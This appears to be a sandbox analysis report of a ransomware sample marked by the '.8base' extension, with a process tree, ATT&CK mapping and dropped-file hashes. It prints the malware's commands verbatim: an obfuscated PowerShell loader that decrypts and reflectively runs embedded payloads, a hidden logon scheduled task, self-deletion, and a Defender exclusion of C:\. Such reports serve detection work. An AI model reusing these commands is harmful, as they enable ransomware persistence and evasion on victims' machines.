"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3152);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
6⤵
PID:668

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneDrive_TYjHE' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\TYjHE.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
6⤵
PID:1228

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\TYjHE.vbs"
6⤵
PID:3600

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\TYjHE.cmd" "
7⤵
PID:1132

C:\Users\Admin\AppData\Roaming\TYjHE.cmd.exe
"C:\Users\Admin\AppData\Roaming\TYjHE.cmd.exe" -w hidden -c $QmQC='ElwQysewQysmwQysentwQysAwQystwQys'.Replace('wQys', '');$Cvyq='LowQysadwQys'.Replace('wQys', '');$Abka='GetwQysCurwQysrenwQystwQysProwQyscewQyssswQys'.Replace('wQys', '');$kkEJ='CrwQyseawQystewQysDewQyscrwQysyptwQysorwQys'.Replace('wQys', '');$uvnc='FrwQysomwQysBaswQyse64wQysStrwQysinwQysgwQys'.Replace('wQys', '');$oAYO='EwQysnwQystryPwQysowQysinwQystwQys'.Replace('wQys', '');$eVXi='ChawQysnwQysgewQysExwQystenwQyssiwQysowQysnwQys'.Replace('wQys', '');$KwUx='MwQysainwQysMowQysdwQysulwQysewQys'.Replace('wQys', '');$Nyws='InvowQyskewQys'.Replace('wQys', '');$JsiC='RwQyseadwQysLiwQysnewQysswQys'.Replace('wQys', '');$xxaz='SwQyspwQysliwQystwQys'.Replace('wQys', '');$OtLn='TrawQysnsfwQysormwQysFinwQysalwQysBlocwQyskwQys'.Replace('wQys', '');function coZUI($OpQVj){$aZVET=[System.Security.Cryptography.Aes]::Create();$aZVET.Mode=[System.Security.Cryptography.CipherMode]::CBC;$aZVET.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$aZVET.Key=[System.Convert]::$uvnc('iQPIhpce7ki6o+IHmlOhdoHm7HC8khIfOxAgdAkNw7A=');$aZVET.IV=[System.Convert]::$uvnc('NkX2UOU09KDD8//UYPJBsg==');$RGpCI=$aZVET.$kkEJ();$aARwL=$RGpCI.$OtLn($OpQVj,0,$OpQVj.Length);$RGpCI.Dispose();$aZVET.Dispose();$aARwL;}function fvMWD($OpQVj){$EEpkF=New-Object System.IO.MemoryStream(,$OpQVj);$pDChj=New-Object System.IO.MemoryStream;$BBOEV=New-Object System.IO.Compression.GZipStream($EEpkF,[IO.Compression.CompressionMode]::Decompress);$BBOEV.CopyTo($pDChj);$BBOEV.Dispose();$EEpkF.Dispose();$pDChj.Dispose();$pDChj.ToArray();}$YoalJ=[System.Linq.Enumerable]::$QmQC([System.IO.File]::$JsiC([System.IO.Path]::$eVXi([System.Diagnostics.Process]::$Abka().$KwUx.FileName, $null)), 1);$ZnOcq=$YoalJ.Substring(2).$xxaz(':');$njBYj=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[0])));$BkieQ=fvMWD (coZUI ([Convert]::$uvnc($ZnOcq[1])));[System.Reflection.Assembly]::$Cvyq([byte[]]$BkieQ).$oAYO.$Nyws($null,$null);[System.Reflection.Assembly]::$Cvyq([byte[]]$njBYj).$oAYO.$Nyws($null,$null);
8⤵
PID:3816

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\TYjHE')
9⤵
PID:3252

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3816);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
9⤵
PID:3408

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:3648

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4672

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2096

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:360

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4448

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:3560

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:924

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2408

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:4480

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:992

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:4516

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:3168

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:1492

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:2320

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1820

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:4140

C:\Windows\explorer.exe
C:\Windows\explorer.exe
1⤵
PID:5016

C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
1⤵
PID:1632

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc UwBlAHQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAA==
1⤵
PID:3256

C:\Users\Admin\AppData\Local\FallbackBuffer\bztdncd\PublicKey.exe
C:\Users\Admin\AppData\Local\FallbackBuffer\bztdncd\PublicKey.exe
1⤵
PID:1900

C:\Users\Admin\AppData\Roaming\dtdurrf
C:\Users\Admin\AppData\Roaming\dtdurrf
1⤵
PID:1168

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

File Deletion

T1107

Virtualization/Sandbox Evasion

T1497

Modify Registry

T1112

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Exfiltration

Command and Control

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems64.dll.id[3DAA590A-3483].[[email protected]].8base
Filesize
3.2MB

MD5
8ac2aae6777230f1a15a4b1d0c31e742

SHA1
bbca9ca87f79bca653747fb34b9317036176bd8f

SHA256
8d1341894c31b852194538fdee0809cdda0dd16f4a4c58f7d606125640f4b73a

SHA512
ef06aa02f204ed45f2b1c36c63a43b67b43cdb23ebb4b4ca9072315666b9030712fbc975eaaf571e3d36971d224984c2ba10abcba60067e176c638c30fa349f5

Download Submit
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\156D.exe
Filesize
221KB

MD5
8a62691e9921ee88ab036aba6f9e45eb

SHA1
288d8268254bf799aef8db58beb18cb35fd903a1

SHA256
a31a45f1c686c1ae2ff1733e7e7636a17010b85091b17bdf68c27543866dfca5

SHA512
75939ee7257ff3a327f89d88612462b31058bb1e09888d055379e77bb2e9c7d7282ba4edfc0e875298318d2bc1fc63741fd8f5e2697855173cf822619ac67a44

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\160764e2f395ecd512ea174af36156ad0d2fbe3e3e78a63a90ff90307b22202a.exe.log
Filesize
1KB

MD5
9e7845217df4a635ec4341c3d52ed685

SHA1
d65cb39d37392975b038ce503a585adadb805da5

SHA256
d60e596ed3d5c13dc9f1660e6d870d99487e1383891437645c4562a9ecaa8c9b

SHA512
307c3b4d4f2655bdeb177e7b9c981ca27513618903f02c120caa755c9da5a8dd03ebab660b56108a680720a97c1e9596692490aede18cc4bd77b9fc3d8e68aa1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\aspnet_compiler.exe.log
Filesize
2KB

MD5
868275f6b0ec3be04be4d6e81495d430

SHA1
9e6f25ee0d29933a2ec9a1711c90f5e3c5b0ccc8

SHA256
2fe54fd67b831c8f134c2e7e79a2f3a33adbb4a3b469c1ade193ccc07a8262ea

SHA512
20a380bb262af2c68186a0b7e19c203da01fb17ac6ac7504e0cea46c8ad143f597063e1bb6a9376c822b13607e3368c4240024a567d496a878b5b9ba13ca4d7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
2338f1a54f2ce62744f4ef7b65febd5b

SHA1
5c3b58b7866fe329674c8adff8baddbefe8f3100

SHA256
dd536a668c9a04bbada61b901519da9eac278dea15964e1729abc3cba458d691

SHA512
f6bec0db5bf4a0c209b9c33195ca93e38d2e484b6987cf6917fadd27bab7905755323ea418121ee1b98770192a2a78c23ae27bbd0d0f51d24c3437e3e95c35ae

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.3.ver0x000000000000001a.db.id[3DAA590A-3483].[[email protected]].8base
Filesize
97KB

MD5
c27c1f7a5e965befd689b4550d3dee90

SHA1
6596eab7ac59a1095ace3cb38cd7b458ef5ee080

SHA256
e8fc5bd825346e8f0c8bb60ced750bdc16f55cf54942c9ce662f0c2548899f06

SHA512
9be8cbc46c42a9a00d6060477687dd48a74df370fff41c5354a8f9618a6fb81861e82d5e4e56e87ceb8ff81bb6f17d5befa25456f19b71df9c62a93a8df6b6ef

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
Filesize
45KB

MD5
5f640bd48e2547b4c1a7421f080f815f

SHA1
a8f4a743f5b7da5cba7b8e6fb1d7ad4d67fefc6a

SHA256
916c83c7c8d059aea295523b8b3f24e1e2436df894f7fae26c47c9bad04baa9c

SHA512
a6ac100a351946b1bbb40c98aeda6e16e12f90f81063aff08c16d4d9afec8ed65c2cbcf25b42946627d67653f75740b1137dab625c99e9492ba35aba68b79a8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive
Filesize
19KB

MD5
d9c7d097dbcb9d19e4e64a474f1e268e

SHA1
3335685d0a6e5f2a4af65d06c758630efb280833

SHA256
56860bd2349daeb7c955ddb70a64105769af7eef048b72b4b4b9d5833a18269a

SHA512
ac2716ead2533a923d265c9a22a85f1a8545f88a38be9681ec4c92fb20c171cbb21db1e64622588b6e253880e98c7fc3c1e02e085955d25e019a3fc345bb4a77

Download Submit
C:\Users\Admin\AppData\Local\Temp\1201.exe
Filesize
1.4MB

MD5
4ee88295d65b7a6e566d200a1c842801

SHA1
5dfb320e933425cea8188f8f7dab346796c3b090

SHA256
b93b9b4b0168407f63a6c2c16a96e4a4b41d5d715bdb9f46254a214570ba1b6b

SHA512
caab773590efe1cab87d209057bb557d52034b522c3fa47e4fb88b792418928cc0eb9a9d45c3c9131bd4af90153d8c44fae0040b04dec484e317ab4c44c7a6c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\1201.exe
Filesize
1.4MB

MD5
4ee88295d65b7a6e566d200a1c842801

SHA1
5dfb320e933425cea8188f8f7dab346796c3b090

SHA256
b93b9b4b0168407f63a6c2c16a96e4a4b41d5d715bdb9f46254a214570ba1b6b

SHA512
caab773590efe1cab87d209057bb557d52034b522c3fa47e4fb88b792418928cc0eb9a9d45c3c9131bd4af90153d8c44fae0040b04dec484e317ab4c44c7a6c4

Download Submit
C:\Users\Admin\AppData\Local\Temp\156D.exe
Filesize
221KB

MD5
8a62691e9921ee88ab036aba6f9e45eb

SHA1
288d8268254bf799aef8db58beb18cb35fd903a1

SHA256
a31a45f1c686c1ae2ff1733e7e7636a17010b85091b17bdf68c27543866dfca5

SHA512
75939ee7257ff3a327f89d88612462b31058bb1e09888d055379e77bb2e9c7d7282ba4edfc0e875298318d2bc1fc63741fd8f5e2697855173cf822619ac67a44

Download Submit
C:\Users\Admin\AppData\Local\Temp\156D.exe
Filesize
221KB

MD5
8a62691e9921ee88ab036aba6f9e45eb

SHA1
288d8268254bf799aef8db58beb18cb35fd903a1

SHA256
a31a45f1c686c1ae2ff1733e7e7636a17010b85091b17bdf68c27543866dfca5

SHA512
75939ee7257ff3a327f89d88612462b31058bb1e09888d055379e77bb2e9c7d7282ba4edfc0e875298318d2bc1fc63741fd8f5e2697855173cf822619ac67a44

Download Submit
C:\Users\Admin\AppData\Local\Temp\156D.exe
Filesize
221KB

MD5
8a62691e9921ee88ab036aba6f9e45eb

SHA1
288d8268254bf799aef8db58beb18cb35fd903a1

SHA256
a31a45f1c686c1ae2ff1733e7e7636a17010b85091b17bdf68c27543866dfca5

SHA512
75939ee7257ff3a327f89d88612462b31058bb1e09888d055379e77bb2e9c7d7282ba4edfc0e875298318d2bc1fc63741fd8f5e2697855173cf822619ac67a44

Download Submit
C:\Users\Admin\AppData\Local\Temp\1BB8.exe
Filesize
220KB

MD5
8d7ebe871589d79f195f240dcef43a57

SHA1
f5315edc9bfeb6f37c9df6ad1f10cb3363412d96

SHA256
19397c6dce459330095edc72759d1e79e26f1e12f013cdaee6dbdb90d65aaae8

SHA512
244be66bb480d320ef6d5cbfcd21e526a53726397c1fc4b512935bc50039b0bb773e3f12fd53910d3da9e69ebb8e3fd1a56d22d2fcb2e090c93c9759cdc497cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\1BB8.exe
Filesize
220KB

MD5
8d7ebe871589d79f195f240dcef43a57

SHA1
f5315edc9bfeb6f37c9df6ad1f10cb3363412d96

SHA256
19397c6dce459330095edc72759d1e79e26f1e12f013cdaee6dbdb90d65aaae8

SHA512
244be66bb480d320ef6d5cbfcd21e526a53726397c1fc4b512935bc50039b0bb773e3f12fd53910d3da9e69ebb8e3fd1a56d22d2fcb2e090c93c9759cdc497cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\1BB8.exe
Filesize
220KB

MD5
8d7ebe871589d79f195f240dcef43a57

SHA1
f5315edc9bfeb6f37c9df6ad1f10cb3363412d96

SHA256
19397c6dce459330095edc72759d1e79e26f1e12f013cdaee6dbdb90d65aaae8

SHA512
244be66bb480d320ef6d5cbfcd21e526a53726397c1fc4b512935bc50039b0bb773e3f12fd53910d3da9e69ebb8e3fd1a56d22d2fcb2e090c93c9759cdc497cd

Download Submit
C:\Users\Admin\AppData\Local\Temp\3A1E.exe
Filesize
6.3MB

MD5
6992433acbb1398c0b539d1cafdf47c4

SHA1
6761b00b2843b79ce8840d1b80170d8e13b588da

SHA256
5d5d5d0c1228f5b2f5589bdf7c247733ed40a0259a2d5969c75b9eb25a8b2304

SHA512
2dca1c59d8c56ebb41c7fef0f780318da299c91f25a9829d10327f5a70ccec40b0260a46554203c6a3d28fce80505f6b025e974cae201e6ff3724abc4a6bc6bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\3A1E.exe
Filesize
6.3MB

MD5
6992433acbb1398c0b539d1cafdf47c4

SHA1
6761b00b2843b79ce8840d1b80170d8e13b588da

SHA256
5d5d5d0c1228f5b2f5589bdf7c247733ed40a0259a2d5969c75b9eb25a8b2304

SHA512
2dca1c59d8c56ebb41c7fef0f780318da299c91f25a9829d10327f5a70ccec40b0260a46554203c6a3d28fce80505f6b025e974cae201e6ff3724abc4a6bc6bc

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.Background.winmd
Filesize
7KB

MD5
64d3f93322e5e6932ad162365441301d

SHA1
832e1b6e6560f8dae2b8282b72a1d80545ea5891

SHA256
df52db081c34a78391d85832bcb2190a9417fb34e468d5f15e84ac1916a085cc

SHA512
86b8e1f699321c6eb187b597a08bdfdd4b47686681e495783b981ca82cfaaa8be22d1775143cfd0a6d3c7b381b419930609c8370e67a906eba9e1b6a5024eb20

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.dll
Filesize
349KB

MD5
49ba729dd7ad347eb8ad44dcc3f20de4

SHA1
36bfc3b216daa23e7c3a1e89df88ca533ad878d1

SHA256
88fd9d7794d1e0549facf9534da6abcb3db4be57e2fd045f678b621f7f5a6f3d

SHA512
c7a6750d34e85534fdf3be543a12340de9623ed7c094b9f8f8dd8e7f7308406e5ee90fe7b3c147b170ed67948bb875f72ad5035ecde3f608843fa74d19f9bf0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe
Filesize
15KB

MD5
a4bd1ce8b5026e59037a3903cd6e4e3a

SHA1
352243b758a585cf869cd9f9354cd302463f4d9d

SHA256
39d69cd43e452c4899dbf1aa5b847c2a2d251fb8e13df9232ebdb5f0fdc3594c

SHA512
c86901a1bdcebc5721743fca6ac7f1909b64518e046752f3b412183db940563c088e0ec12613ad0b763c814bc3b6bf99dd3b6f8a6bce54add30a10d29e38400c

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletLockScreenLogo.scale-200.png
Filesize
268B

MD5
541abea8b402b4ddd7463b2cd1bf54ec

SHA1
e0bfa993adcc35d6cc955be49c2f952529660ad5

SHA256
d436906bb661ba5d0ae3ad2d949b709f92bf50eb79a9faedd7f66d5598e07f16

SHA512
b22478881f719ac94392ef43dbf553c4644e2b3676191cb35c7bd212f496978e5b4e15869d254b96a393314a30e2ce397a6d6bf44cac45a2eff38d997b40c7f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSplashScreen.png
Filesize
1KB

MD5
52bf805c4241200c576401a59f9e211a

SHA1
a10074a87d7c244fcee9b8d45005673aa48140a1

SHA256
adee2dfff644b55f272b54cd8742e886a2bb21623c4f1e6b3058ccf97588d87c

SHA512
9142a45cc68422a51e84ad58858409e7fe711cd120565f0d36d3e7b3f7e9a771e83549d9d852f708a41a511fc0a1989a0315b141ddc122b014f533b0466ad688

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSquare150x150Logo.scale-200.png
Filesize
946B

MD5
0262d1daca4c1c1e22dec63b012e3641

SHA1
609258b00f17f2a9dd586fe5a7e485573ef477c9

SHA256
8b0ccafcace92ee624e057fa91550d306efd5dc21bb0c850c174ef38d79754fc

SHA512
a1ad7e32bfabfa4ecf32be9ab96db5c84ecf48a8b8a6e267cb106281e119669fed0fb12eaea024e21aa2f13de8f14fa0b805f869b53ec85524b60dc1db7743d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSquare44x44Logo.scale-200.png
Filesize
14KB

MD5
1572efa3e47162a7b2198893a362b803

SHA1
a291f6f1cae15d03d5ef0f748b83bee024aa2fca

SHA256
d39fb03894ed83d57acf16976ae256c9912bd7e9feb63cb5c85709e1617e90dc

SHA512
4267d64626b808e9b338d973335794a5b3c3586c26fb0d11c96b07c2ad551486150449d83d5ae2756451c32365a8877a0c59592e5b173a27142464787de7ff45

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSquare44x44Logo.targetsize-24_altform-unplated.png
Filesize
169B

MD5
2bb84fb822fe6ed44bf10bbf31122308

SHA1
e9049ca6522a736d75fc85b3b16a0ad0dc271334

SHA256
afb6768acc7e2229c7566d68dabf863bafdb8d59e2cca45f39370fc7261965dc

SHA512
1f24ca0e934881760a94c1f90d31ef6ccbab165d39c0155fb83b31e92abe4e5e3b70f49189f75d8cdd859796a55312f27c71fda0b8296e8cf30167a02d7391f5

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletStoreLogo.png
Filesize
174B

MD5
08de9d6a366fb174872e8043e2384099

SHA1
955114d06eefae5e498797f361493ee607676d95

SHA256
0289105cf9484cf5427630866c0525b60f6193dea0afacd0224f997ce8103861

SHA512
59004a4920d5e3b80b642c285ff649a2ee5c52df25b6209be46d2f927a9c2ab170534ea0819c7c70292534ee08eb90e36630d11da18edba502776fac42872ed0

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\Program Files\WindowsApps\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletWide310x150Logo.scale-200.png
Filesize
1KB

MD5
52bf805c4241200c576401a59f9e211a

SHA1
a10074a87d7c244fcee9b8d45005673aa48140a1

SHA256
adee2dfff644b55f272b54cd8742e886a2bb21623c4f1e6b3058ccf97588d87c

SHA512
9142a45cc68422a51e84ad58858409e7fe711cd120565f0d36d3e7b3f7e9a771e83549d9d852f708a41a511fc0a1989a0315b141ddc122b014f533b0466ad688

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\ProgramData\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_neutral_~_8wekyb3d8bbwe.xml
Filesize
1KB

MD5
5b333e85c957925ec5f7ae9c47872020

SHA1
97431745824321574e6e6c9666e79147b5a6ea67

SHA256
c2c28b18a9bbe65c7f29640ec18d5836fa51ce720b336dc6e44d49ff2d807d08

SHA512
377b42d7a432c597cbf41c5c9f4303592f88a3fef368e53532ec1474529d5d915f264ca1f099c269a4d4bc35fea22d35140d45c099f4fdb66be8cb109b533f80

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\ProgramData\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe.xml
Filesize
4KB

MD5
44628eb64853341f7678ec488959efe2

SHA1
60e37cb04f7941b6070d3ce035af3d434c78fbfd

SHA256
f44e196695dffbc9442ab694343447097b8362fccaf4269057890f39da50df2e

SHA512
0134c598e3ada0a5ae47c9803b1c0f248d88a92c5fd79dd2baea7dea82322ff52f8b218be41bd3b72f270fe170ad36df5106d2f21ca51be5f8f3c6791da9d86f

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_neutral_~_8wekyb3d8bbwe.xml
Filesize
1KB

MD5
5b333e85c957925ec5f7ae9c47872020

SHA1
97431745824321574e6e6c9666e79147b5a6ea67

SHA256
c2c28b18a9bbe65c7f29640ec18d5836fa51ce720b336dc6e44d49ff2d807d08

SHA512
377b42d7a432c597cbf41c5c9f4303592f88a3fef368e53532ec1474529d5d915f264ca1f099c269a4d4bc35fea22d35140d45c099f4fdb66be8cb109b533f80

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\Users\All Users\Microsoft\Windows\AppRepository\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe.xml
Filesize
4KB

MD5
44628eb64853341f7678ec488959efe2

SHA1
60e37cb04f7941b6070d3ce035af3d434c78fbfd

SHA256
f44e196695dffbc9442ab694343447097b8362fccaf4269057890f39da50df2e

SHA512
0134c598e3ada0a5ae47c9803b1c0f248d88a92c5fd79dd2baea7dea82322ff52f8b218be41bd3b72f270fe170ad36df5106d2f21ca51be5f8f3c6791da9d86f

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.Background.winmd
Filesize
7KB

MD5
64d3f93322e5e6932ad162365441301d

SHA1
832e1b6e6560f8dae2b8282b72a1d80545ea5891

SHA256
df52db081c34a78391d85832bcb2190a9417fb34e468d5f15e84ac1916a085cc

SHA512
86b8e1f699321c6eb187b597a08bdfdd4b47686681e495783b981ca82cfaaa8be22d1775143cfd0a6d3c7b381b419930609c8370e67a906eba9e1b6a5024eb20

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.dll
Filesize
349KB

MD5
49ba729dd7ad347eb8ad44dcc3f20de4

SHA1
36bfc3b216daa23e7c3a1e89df88ca533ad878d1

SHA256
88fd9d7794d1e0549facf9534da6abcb3db4be57e2fd045f678b621f7f5a6f3d

SHA512
c7a6750d34e85534fdf3be543a12340de9623ed7c094b9f8f8dd8e7f7308406e5ee90fe7b3c147b170ed67948bb875f72ad5035ecde3f608843fa74d19f9bf0b

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\Microsoft.Wallet.exe
Filesize
15KB

MD5
a4bd1ce8b5026e59037a3903cd6e4e3a

SHA1
352243b758a585cf869cd9f9354cd302463f4d9d

SHA256
39d69cd43e452c4899dbf1aa5b847c2a2d251fb8e13df9232ebdb5f0fdc3594c

SHA512
c86901a1bdcebc5721743fca6ac7f1909b64518e046752f3b412183db940563c088e0ec12613ad0b763c814bc3b6bf99dd3b6f8a6bce54add30a10d29e38400c

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletLockScreenLogo.scale-200.png
Filesize
268B

MD5
541abea8b402b4ddd7463b2cd1bf54ec

SHA1
e0bfa993adcc35d6cc955be49c2f952529660ad5

SHA256
d436906bb661ba5d0ae3ad2d949b709f92bf50eb79a9faedd7f66d5598e07f16

SHA512
b22478881f719ac94392ef43dbf553c4644e2b3676191cb35c7bd212f496978e5b4e15869d254b96a393314a30e2ce397a6d6bf44cac45a2eff38d997b40c7f6

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSplashScreen.png
Filesize
1KB

MD5
52bf805c4241200c576401a59f9e211a

SHA1
a10074a87d7c244fcee9b8d45005673aa48140a1

SHA256
adee2dfff644b55f272b54cd8742e886a2bb21623c4f1e6b3058ccf97588d87c

SHA512
9142a45cc68422a51e84ad58858409e7fe711cd120565f0d36d3e7b3f7e9a771e83549d9d852f708a41a511fc0a1989a0315b141ddc122b014f533b0466ad688

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSquare150x150Logo.scale-200.png
Filesize
946B

MD5
0262d1daca4c1c1e22dec63b012e3641

SHA1
609258b00f17f2a9dd586fe5a7e485573ef477c9

SHA256
8b0ccafcace92ee624e057fa91550d306efd5dc21bb0c850c174ef38d79754fc

SHA512
a1ad7e32bfabfa4ecf32be9ab96db5c84ecf48a8b8a6e267cb106281e119669fed0fb12eaea024e21aa2f13de8f14fa0b805f869b53ec85524b60dc1db7743d0

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSquare44x44Logo.scale-200.png
Filesize
14KB

MD5
1572efa3e47162a7b2198893a362b803

SHA1
a291f6f1cae15d03d5ef0f748b83bee024aa2fca

SHA256
d39fb03894ed83d57acf16976ae256c9912bd7e9feb63cb5c85709e1617e90dc

SHA512
4267d64626b808e9b338d973335794a5b3c3586c26fb0d11c96b07c2ad551486150449d83d5ae2756451c32365a8877a0c59592e5b173a27142464787de7ff45

Download Submit
C:\Users\Admin\AppData\Local\Temp\69F5\C\Windows\InfusedApps\Packages\Microsoft.Wallet_1.0.16328.0_x64__8wekyb3d8bbwe\images\WalletSquare44x44Logo.targetsize-24_altform-unplated.png
Filesize
169B

MD5
2bb84fb822fe6ed44bf10bbf31122308

SHA1
e9049ca6522a736d75fc85b3b16a0ad0dc271334

SHA256
afb6768acc7e2229c7566d68dabf863bafdb8d59e2cca45f39370fc7261965dc

SHA512
1f24ca0e934881760a94c1f90d31ef6ccbab165d39c0155fb83b31e92abe4e5e3b70f49189f75d8cdd859796a55312f27c71fda0b8296e8cf30167a02d7391f5

